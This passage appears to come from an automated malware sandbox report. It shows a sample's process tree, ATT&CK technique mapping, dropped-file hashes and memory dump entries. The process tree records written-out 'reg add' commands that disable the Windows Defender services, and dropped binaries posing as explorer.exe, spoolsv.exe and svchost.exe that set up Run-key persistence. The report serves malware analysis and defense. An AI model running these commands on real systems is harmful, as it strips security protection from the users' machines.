      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:4728
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3476
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      PID:3120
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      PID:1836
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      PID:4020
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      PID:320
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:3856
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4784
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:228
  - - \??\c:\windows\resources\spoolsv.exe
      c:\windows\resources\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1040
    - - \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3568
      - \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\symsrv.dll

Filesize
67KB

MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
caaf5459b51d495e61be65d36ebc854d

SHA1
9197d0739f59ec5f4f3c9d5dbd0e4b5621ec04ff

SHA256
1d44071558bbeec0bf02bc3dc0ef10ff26ae66bf24a9636ed5b039cc8ebfe8c6

SHA512
4775e3d50f5ded7c5887941ecb4b7a7cb35406dd6f496e1ad74d3b7c7cda3b16884ebbd0f7bed4c11d54177dc8fc9c16eb7b082e9c06efd92f63a756ed950b3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3161f4edbc9b963debe22e29658050b

SHA1
45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

SHA256
1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

SHA512
006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fd98baf5a9c30d41317663898985593b

SHA1
ea300b99f723d2429d75a6c40e0838bf60f17aad

SHA256
9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

SHA512
bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
d9c1c8f58b566e041b49cdd321711448

SHA1
24e138bada5410d41b9c4f1d47ccdd7d730fae52

SHA256
bcc5c38901eb2bc601089ebe4138e9936700b5652b829e360ea280edf7c394a4

SHA512
ee9072c3201874a1523bc7945564e3459f56c77c4052bdc7d7e126d2c112c3de435b2ee0feee103aadf89c5d422b2ec0c5f4d9e553fe127fb9e2f94543654037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e339c0ad3aca4c33b09c7c76ed797a15

SHA1
774102d11041d48de215821b67686774605ae7c8

SHA256
2a0aba6fbf082818826c0ccb8664909831bb8f9e79b92cc2a1b4c08c4932d04d

SHA512
13e14f7de043df47570d8472666037180137a6afcb7b89e3b3164d60be7f322abce69dd5fbb3e203e01d0e23ffe77274358915d646323bb18b4d64520e69ec46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
083782a87bd50ffc86d70cbc6f04e275

SHA1
0c11bc2b2c2cf33b17fff5e441881131ac1bee31

SHA256
7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

SHA512
a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c1a54dd5a1ab44cc4c4afd42f291c863

SHA1
b77043ab3582680fc96192e9d333a6be0ae0f69d

SHA256
c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

SHA512
010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
217d9191dfd67252cef23229676c9eda

SHA1
80d940b01c28e3933b9d68b3e567adc2bac1289f

SHA256
e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

SHA512
86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3072fa0040b347c3941144486bf30c6f

SHA1
e6dc84a5bd882198583653592f17af1bf8cbfc68

SHA256
da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

SHA512
62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

Download Submit
C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe

Filesize
177KB

MD5
2898552d3a7845982c161116ad933d27

SHA1
02cc92d5df84b88648f6b7b69ac6c1aff574bef0

SHA256
6e8c04f038f91e03bd97ce704a5c8c3da19836ea984fec10708c99e0a1a71f26

SHA512
ca90a7396b4f0c582ef79f52c0c7a3de1fb53798291eda771f77f9b7bb36615e30d7d2443e34aa3b95b5529a645325adefff9f796fea421791e38a0e37f1851f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7FCF.tmp\7FD0.tmp\7FD1.bat

Filesize
4KB

MD5
c9a8191ee366721dc76c094d31d507d1

SHA1
396eb8e788fc82491b997b264b61a81ce6614b5a

SHA256
d8622f7694a69be3f25b7e4f012cb56a2e4b6c1c358a9538ea54ea646a434a2b

SHA512
eaa7e41b28891f88e6eccd108b7990642c0705c4ab9b1289778df693b8e33b31f728840d2d53397463849e3d7900e83b1a1aac26fd654e12a727a05472ff75bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbda0tmc.bl2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
e9aba523bede78201bae5181992b8c21

SHA1
ac7dcc7422c70e60f6d68342c3e1de21be46aac7

SHA256
d55efb4853e0b3e0c9833dd5d225ea83e298188e7b06858a4c049364d3ff029d

SHA512
3932b83cc8b659e7dca33be0f59d0e9fdc16b039b840b1c9e4e4b3fc28af42471bddd29ea0dfa7010cac64827c628d60c17948ff733b295a5a59d1d54eab9fa1

Download Submit
C:\Windows\Resources\Themes\icsys.icn.exe

Filesize
135KB

MD5
809b156135c25258ad413ff6c2605f55

SHA1
62563abc9aa087013fca7aff5d7068f3335d5c26

SHA256
93b6be77688a21d8e6e9122d304b9e048dc615724b76825f4be38d962b53239b

SHA512
4a8f89e7fa88934f6336453a50b62809d60957419c2dfbe6f42b89a5322417da77387f4815724a4d88ca1433b6c8862fe13cc57683d5ef7cc6f3e3fd320bce1c

Download Submit
C:\Windows\Resources\spoolsv.exe

Filesize
135KB

MD5
3d14a87b577875cfc922b145430eb9f4

SHA1
629904e099f766ececdb8baaf5676fda1ffa5d14

SHA256
41d789ec5601cf0a6d70872038a005594eb98ce6ddfe6b85a0b48f30e1e712dc

SHA512
845a39d2a370c04942de738cd234776648d6a792e551943e32bac66e28f80899725b97ed2e337e0da1e211647352f5b6c100455c40d449be84499f5b4abbc1a1

Download Submit
\??\c:\windows\resources\svchost.exe

Filesize
135KB

MD5
83acbe153d8fad3c77fc123e73380193

SHA1
2bb9879d4db563b7bcd9c72ff0519e750781b65b

SHA256
69f29be5a50b87acf0ad803a45bd5681ceabb62daccde43a9da4fa769f49ff96

SHA512
4dab8a91c5741aec99aaa851bc13b268e141840aa6303ca4f2adc29f1316bf681a1fd1adf1ac2dd57dffa09f066cbe165e6e4a376b14da1b45723952f9097858

Download Submit
memory/228-250-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/392-93-0x000001EEBFA20000-0x000001EEBFB6E000-memory.dmp

Filesize
1.3MB

Download
memory/1040-65-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1184-118-0x0000021279DA0000-0x0000021279FBC000-memory.dmp

Filesize
2.1MB

Download
memory/1352-14-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/1352-10-0x0000000000401000-0x0000000000402000-memory.dmp

Filesize
4KB

Download
memory/1352-154-0x0000000000401000-0x0000000000402000-memory.dmp

Filesize
4KB

Download
memory/1352-16-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1352-176-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/1352-249-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1352-199-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1352-248-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/2432-54-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3268-0-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3268-66-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3308-153-0x000002C3B7940000-0x000002C3B7B5C000-memory.dmp

Filesize
2.1MB

Download
memory/3568-45-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3568-251-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/4156-141-0x00000252A03E0000-0x00000252A05FC000-memory.dmp

Filesize
2.1MB

Download
memory/4784-67-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/4860-105-0x000001F5B6980000-0x000001F5B6B9C000-memory.dmp

Filesize
2.1MB

Download
memory/5080-60-0x000002C052900000-0x000002C052922000-memory.dmp

Filesize
136KB

Download